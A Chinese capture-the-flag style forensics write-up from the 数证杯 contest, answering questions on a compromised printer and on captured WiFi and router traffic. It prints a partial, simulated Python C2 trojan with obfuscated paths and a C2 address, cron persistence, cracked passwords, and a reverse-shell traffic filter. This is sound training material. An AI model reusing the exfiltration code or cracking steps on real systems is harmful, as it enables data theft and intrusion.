当前位置: 首页 > news >正文

第二届数证杯物联网取证+网络流量取证

第二届数证杯物联网取证+网络流量取证

物联网取证

打印机的主机名称是什么?

print

image-20251110144106457

打印文件存储在哪个目录?

/var/spool/cups

这里我是通过分析木马源文件拿到的

image-20251110150850042

同一天,打印两份文件的用户是谁?

alice

alice 112 PRINTER-RD-01 [06/Aug/2025:14:22:10 +0800] 1 12 "Project Dragonfire - Power Core Design.pdf" -
bob 105 PRINTER-RD-01 [06/Aug/2025:11:05:45 +0800] 1 1 "font_update_manual.ps" -
alice 111 PRINTER-RD-01 [06/Aug/2025:14:20:05 +0800] 1 22 "Project Dragonfire - Architectural Overview.pdf" -

image-20251110145221877

分析物联网检材,木马运行后,自身产生的进程ID是多少?

2177

这里我的误区就是没看日志,直接虚拟仿真,然后去查看进程,找木马定时任务的进程,但是看到的进程是错误的进程

0aa0141e-54b2-4b6b-b70e-02200877d1f6

我们去查看日志,查看/var/log/syslog。

Aug 6 09:15:01 PRINTER-RD-01 systemd[1]: System start.
Aug 6 09:15:10 PRINTER-RD-01 systemd[1]: Started CUPS Scheduler.
Aug 6 14:30:00 PRINTER-RD-01 CRON[2176]: (root) CMD (/usr/local/bin/cups-helper)
Aug 6 14:30:01 PRINTER-RD-01 cups-helper[2177]: Attempting to connect to C2 server 185.199.108.153 on port 443.

2177进程,远程连接185.199.108.153:443

分析物联网检材,系统中存在一个非标定时任务,这个任务每隔多少分钟执行?

10

查看定时任务位置:/etc/cron.d/

发现可疑进程(查看源文件后,其实是一个C2木马) 10分钟执行一次

image-20251110145631530

分析物联网检材,木马程序会窃取文档暂存在隐藏目录,这个目录的绝对路径?

/tmp/.cache/

分析木马源文件:

#!/usr/bin/python3
# -*- coding: utf-8 -*-# A helper script to manage CUPS spooling and perform health checks.
# Do not modify unless you are an authorized technician.
# KVJEYIHHXSLOPIEBEAWT4ICCMFZWKNRUEDT3ZFXHUCASALJ6EDS23F7HVSTOJOFS4WHY32F5VQ======import os
import shutil
import socket
import datetime
import re# --- Configuration ---
# C2 server for uploading diagnostic data
C2_SERVER = "zUTMugDMx4SO5EjL1gTM"
C2_PORT = "zQDN"# Spool directory to monitor
SPOOL_DIR = "GJTJzBXdjZkMlw2bvB3cGJTJyFmdGJTJ"# Define staging directory for processing before exfiltration
STAGING_DIR = "GJTJlh2YhNmLGJTJw1GdGJTJ"# Log file for upload activities
LOG_FILE = "==wZvxmLkF2bsBXdGJTJlJXYoNnRyUCbhN2bs5iRyUCdv9mcGJTJ"# Keyword to identify sensitive documents for "special handling"
WATCHED_KEYWORD = "=UmcpZmbvdWYyREMyUCdjVmavJHU"
# --- End Configuration ---def log_message(message):"""Appends a timestamped message to the log file."""now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")full_message = f"[{now}] {message}\n"with open(LOG_FILE, 'a') as f:f.write(full_message)def scan_and_stage():"""(Simulated) Scans the spool directory and copies sensitive files to the staging area."""passdef exfiltrate_data():"""(Simulated) 'Uploads' files from the staging directory to the C2 server."""if not os.path.exists(STAGING_DIR):returnstaged_files = os.listdir(STAGING_DIR)if not staged_files:returntry:# The system log entry shows this connection attempt.# This part of the script provides the "ground truth" for that log.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(5)# sock.connect((C2_SERVER, C2_PORT)) for filename in staged_files:log_message(f"SUCCESS: Uploaded {filename} to {C2_SERVER}")sock.close()except Exception as e:log_message(f"ERROR: Could not connect 

加密方式就是做了个逆序的操作

分析物联网检材,木马程序将数据上传到的服务器的IP地址是多少?

185.199.108.153

根据木马程序,它监视的关键字是什么?

Project Dragonfire

网络流量取证

黑客攻击的目标路由器SSID为(答案格式:请按实际值填写)

don’t panic

image-20251110152201485

黑客成功捕获了WIFI中WPA协议握手包,其中有效握手包组数为(完整握手为一组)(答案格式:1)

4

查找eapol协议帧

WPA 完整握手的 4 个帧均为 EAPOL Key 帧(协议类型标注为 EAPOL),且可通过帧详情区分顺序

image-20251110152456359

黑客爆破得出的WiFi密码为(提示:密码由小写英文字母和数字组成)(答案格式:abcd1234)

password1110

image-20251110152627455

黑客成功连接Wifi后,发现路由器操作系统为?(答案格式:请按实际值填写)

ImmortalWrt

这里可以看到访问成功的页面,路由器的操作系统为:ImmortalWrt

image-20251110154842354

黑客对路由器后台进行爆破攻击,该路由器后台密码为(答案格式:请按实际值填写)

image-20251110153627762

黑客通过修改路由器设置,将被劫持的域名为(答案格式:www.xxx.com)

www.qq.com

过滤DNS

这里劫持域名,如果查询的时候,响应域名则会存在,这里劫持www.qq.com,响应IP为192.168.1.244

image-20251110155419539

黑客在路由器管理后台发现FTP服务配置,FTP登录密码为?(答案格式:请按实际值填写)

image-20251110153627762

黑客通过FTP上传了一个压缩包文件,该文件内容为(答案格式:请按实际值填写)

code:123456789

导出文件,密码爆破即可

image-20251110154952668

黑客通过路由器执行shell脚本,反弹shell的监听端口为(答案格式:1)

4445

反弹shell,查找http且包括”/bin/sh“的内容

http && http contains "/bin/sh"

image-20251110160214908

黑客通过反弹she1ll成功控制目标路由器后,总共执行了多少条命令(答案格式:1)

4

切换流,在第918流处找到流量,共执行4次

image-20251110160903591

http://www.dtcms.com/a/592952.html

相关文章:

  • 宁夏住房和城乡建设厅网站首页公司主页和公司网站
  • 如何在 macOS 上安装和配置 Redis ?
  • 【Linux网络】Socket编程实战,基于UDP协议的Dict Server
  • web京东商城前端项目4页面
  • 15、Linux 打包压缩命令
  • 网站后台源代码更改营销广告策划方案
  • 数据库迁移革命:金仓KReplay如何用真实负载回放技术缩短3周测试周期
  • 网站开发搭建合同范本企业软件解决方案
  • Java 中 Arrays.sort() 的底层实现
  • MPAndroidChart 双柱分组图:解决 X 轴标签无法居中问题及 UI 宽度计算指南
  • 政务外网终端一机两用安全管控解决方案
  • 数字华容道游戏
  • M4-R1 开源鸿蒙(OpenHarmory)开发板丨串口调试助手实战案例
  • 建材做网站好吗破解插件有后门wordpress
  • 旅游网站建设流程步骤怎么自己做礼品网站
  • C语言--文件读写函数的使用,对文件读写知识有了更深的了解。C语言--文件读写函数的使用,对文件读写知识有了更深的了解。
  • 数据结构示例代码
  • 数字化工厂:基于层级模型的智能制造新范式
  • C语言--变量(全局变量、局部变量、初始化)
  • 羊驼送洗后因毛发未吹干致失温死亡,物联网技术助力防范宠物洗澡失温事故
  • Raylib 基本绘图操作
  • (Arxiv-2025)BINDWEAVE:通过跨模态整合实现主体一致性的视频生成
  • 怎么做会员积分网站建网站商城有哪些公司
  • 网站如何验证登陆状态广州专业做网页的公司
  • MySQL的增删改查功能合集
  • Oracle数据块编辑工具( Oracle Block Editor Tool)-obet
  • 什么是量子纠缠?大白话
  • 用服务器自建 RustDesk 远程控制平台
  • 新手做网站如何被百度快速收录教程
  • 基于java技术的田径俱乐部网站的设计与实现